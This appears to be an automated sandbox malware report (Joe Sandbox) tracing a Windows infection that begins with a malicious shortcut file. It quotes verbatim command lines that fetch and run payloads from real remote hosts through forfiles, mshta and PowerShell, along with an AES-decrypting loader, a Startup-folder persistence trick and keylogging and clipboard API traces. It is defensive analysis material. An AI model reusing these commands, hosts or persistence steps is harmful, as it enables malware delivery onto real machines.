Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Code function: 19_2_00007FF656D40D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\Public\Guard.exe Code function: 30_2_003C4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 35_2_00B54830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Code function: 19_2_00007FF656D40A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Code function: 19_2_00007FF656D27E64 GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
Source: C:\Users\Public\Guard.exe Code function: 30_2_003DD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 35_2_00B6D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

System Summary

Source: Process Memory Space: powershell.exe PID: 612, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: powershell.exe, 00000008.00000002.2347436380.000001BE20956000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: This is a third-party compiled AutoIt script.
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Code function: This is a third-party compiled AutoIt script. 19_2_00007FF656CB37B0
Source: PefjSkkhb.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: PefjSkkhb.exe, 00000013.00000000.2298099515.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmp String found in binary or memory: This is a third-party compiled AutoIt script.
Source: PefjSkkhb.exe.8.dr String found in binary or memory: This is a third-party compiled AutoIt script.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\PefjSkkhb.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Guard.exe
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: R4qP4YM0QX.lnk LNK file: /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/FILEANH
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Code function: 19_2_00007FF656D2BF80: CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Code function: 19_2_00007FF656D1D2C4 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe Code function: 19_2_00007FF656D2D750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\Public\Guard.exe Code function: 30_2_003B5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 35_2_00B45778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00AEF6A035_2_00AEF6A0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00AFF62835_2_00AFF628
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00AE166335_2_00AE1663
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B078C335_2_00B078C3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B0DBA535_2_00B0DBA5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B01BA835_2_00B01BA8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B19CE535_2_00B19CE5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00AFDD2835_2_00AFDD28
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B0BFD635_2_00B0BFD6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 35_2_00B01FC035_2_00B01FC0
Source: Joe Sandbox View | Dropped File: C:\Users\Public\Guard.exe D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe | Code function: String function: 00007FF656CD8D58 appears 76 times
Source: C:\Users\Public\Guard.exe | Code function: String function: 00361A36 appears 34 times
Source: C:\Users\Public\Guard.exe | Code function: String function: 00370D17 appears 70 times
Source: C:\Users\Public\Guard.exe | Code function: String function: 00378B30 appears 42 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: String function: 00AF1A36 appears 34 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: String function: 00B00D17 appears 70 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: String function: 00B08B30 appears 42 times
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe | Process created: Commandline size = 3052
Source: Process Memory Space: powershell.exe PID: 612, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.expl.evad.winLNK@75/255@13/10
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe | Code function: 19_2_00007FF656D33778 GetLastError,FormatMessageW
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe | Code function: 19_2_00007FF656D1D5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe | Code function: 19_2_00007FF656D1CCE0 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\Public\Guard.exe | Code function: 30_2_003A8DE9 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\Public\Guard.exe | Code function: 30_2_003A9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 35_2_00B38DE9 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | Code function: 35_2_00B39399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe | Code function: 19_2_00007FF656D357B0 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe | Code function: 19_2_00007FF656D2BE00 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe | Code function: 19_2_00007FF656D35F2C CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe | Code function: 19_2_00007FF656CB6580 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Windows\System32\mshta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\FILEANH[1]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9160:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5996:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1404:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8552:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aiuo1yij.j2r.ps1
Source: C:\Windows\System32\conhost.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\forfiles.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: R4qP4YM0QX.lnk | ReversingLabs: Detection: 18%
Source: unknown | Process created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/FILEANH
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . \*i*\*2\msh*e https://tiffany-careers.com/FILEANH
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://tiffany-careers.com/FILEANH
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\user\AppData\Roaming\New_2025.webp
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=2208,i,10322920844416449254,4510193414776535849,262144 /prefetch:3
Source: unknown | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate --single-argument C:\Users\user\AppData\Roaming\New_2025.webp
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2308 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\PefjSkkhb.exe "C:\Users\user\AppData\Roaming\PefjSkkhb.exe"
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/kiiMf" -OutFile "C:\Users\Public\Guard.exe""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6584 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6864 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7296 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6812 --field-trial-handle=2040,i,3398984765229184630,2907771094226885372,262144 /prefetch:8
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function clean ($pzaMyJg){return -split ($pzaMyJg -replace '..', '0x$& ')};$KUtXL = clean [...] iqxjTB = [System.Security.Cryptography.Aes]::Create();$IiqxjTB.Key = clean('747464414A50546B43514F4F4B7A5077');$IiqxjTB.IV = New-Object byte[] 16;$UdJKkrroG = $IiqxjTB.CreateDecryptor();$mhREwMEES = [Text.Encoding]::UTF8.GetString
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Users\Public\Guard.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
